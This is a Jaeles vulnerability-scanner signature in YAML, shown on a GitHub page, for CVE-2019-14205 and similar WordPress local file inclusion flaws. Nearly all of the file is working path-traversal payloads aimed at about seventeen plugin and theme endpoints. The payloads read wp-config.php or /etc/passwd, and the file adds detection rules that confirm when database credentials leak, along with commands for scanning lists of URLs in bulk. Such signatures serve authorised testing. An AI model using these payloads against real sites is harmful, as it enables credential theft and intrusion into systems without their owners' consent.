forked from coolboy0816/pxplan
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2019-14205.yaml
47 lines (42 loc) · 2.39 KB
/
CVE-2019-14205.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
id: cve-2019-14205
info:
name: Multiples Wordpress LFI
risk: High
# jaeles scan -c 50 -s /path/to/this-sign.yaml -U list_urls.txt
# or assume wordpress app is under /blog/ URLs
# jaeles scan -c 50 -s /path/to/this-sign.yaml -u http:https://www.example.com -p 'root=http:https://www.example.com/blog'
params:
- root: '{{.BaseURL}}'
variables:
- vul: |
/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php
/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php
/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
/?aam-media=wp-config.php
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php
/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
requests:
- method: POST
redirect: false
url: >-
{{.root}}{{.vul}}
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
StatusCode() == 200 && StringSearch("response", 'DB_USER') && StringSearch("response", 'DB_PASSWORD')
- >-
StatusCode() == 200 && StringSearch("response", 'root:') && StringSearch("response", 'bin:x:')
references:
- https://www.cvebase.com/cve/2019/14205